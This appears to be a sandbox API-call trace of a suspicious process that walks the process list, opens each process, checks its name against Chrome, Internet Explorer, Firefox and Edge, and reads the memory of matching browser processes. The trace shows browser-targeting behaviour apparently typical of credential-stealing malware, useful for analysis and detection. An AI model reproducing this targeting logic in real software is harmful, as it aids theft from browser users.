	[0204.885] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0204.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.885] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.886] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0204.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.886] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.886] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0204.887] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2a80
	[0204.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.887] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0204.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.888] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.888] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0204.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.889] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.890] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0204.890] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2a84
	[0204.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.890] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0204.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.891] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.894] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0204.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.895] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.895] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0204.896] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x2a88
	[0204.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.896] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0204.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.896] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0204.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.896] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0204.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.897] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.897] NtQueryInformationProcess (in: ProcessHandle=0x2a88, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0204.897] ReadProcessMemory (in: hProcess=0x2a88, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0204.897] ReadProcessMemory (in: hProcess=0x2a88, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0204.897] ReadProcessMemory (in: hProcess=0x2a88, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0204.897] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0204.897] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0204.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2a8c
	[0204.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.898] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0204.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.898] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0204.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.899] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0204.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.899] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.899] NtQueryInformationProcess (in: ProcessHandle=0x2a8c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0204.899] ReadProcessMemory (in: hProcess=0x2a8c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0204.899] ReadProcessMemory (in: hProcess=0x2a8c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0204.899] ReadProcessMemory (in: hProcess=0x2a8c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0204.899] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0204.900] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0204.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2a90
	[0204.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.900] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0204.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.901] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.901] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0204.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.901] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.901] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0204.902] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x2a94
	[0204.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.902] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0204.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.903] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.903] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0204.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.903] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.903] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x2a98
	[0204.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.904] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.905] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.905] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.905] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.905] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.906] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.907] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2a9c
	[0204.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.907] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.907] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.907] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.908] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.908] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0204.909] CloseHandle (hObject=0x188) returned 1
	[0204.909] Sleep (dwMilliseconds=0x64) 
	[0205.037] GetCurrentProcessId () returned 0x110
	[0205.037] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0205.040] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0205.040] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0205.041] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0205.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2aa0
	[0205.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.042] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.042] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.043] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.043] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.043] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0205.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2aa4
	[0205.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.044] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.044] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.044] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.045] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.045] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0205.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2aa8
	[0205.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.046] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0205.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.046] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.046] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0205.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.047] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.047] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0205.048] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2aac
	[0205.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.048] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.048] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.048] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.049] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.049] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0205.050] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2ab0
	[0205.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.050] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0205.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.050] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.050] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0205.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.051] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.051] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0205.052] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2ab4
	[0205.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.052] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0205.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.052] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.052] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0205.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.053] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.053] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0205.054] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2ab8
	[0205.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.054] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0205.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.054] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.054] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0205.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.055] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.055] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0205.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2abc
	[0205.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.056] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0205.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.056] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.056] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0205.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.056] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.056] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.057] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2ac0
	[0205.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.057] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.058] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.058] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.058] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.059] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.059] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2ac4
	[0205.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.059] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.060] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.060] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.060] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.060] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.061] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2ac8
	[0205.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.061] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.062] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.062] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.062] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.063] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.063] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2acc
	[0205.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.063] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.064] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.064] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.065] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.065] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.066] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2ad0
	[0205.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.066] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.067] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.067] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.067] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
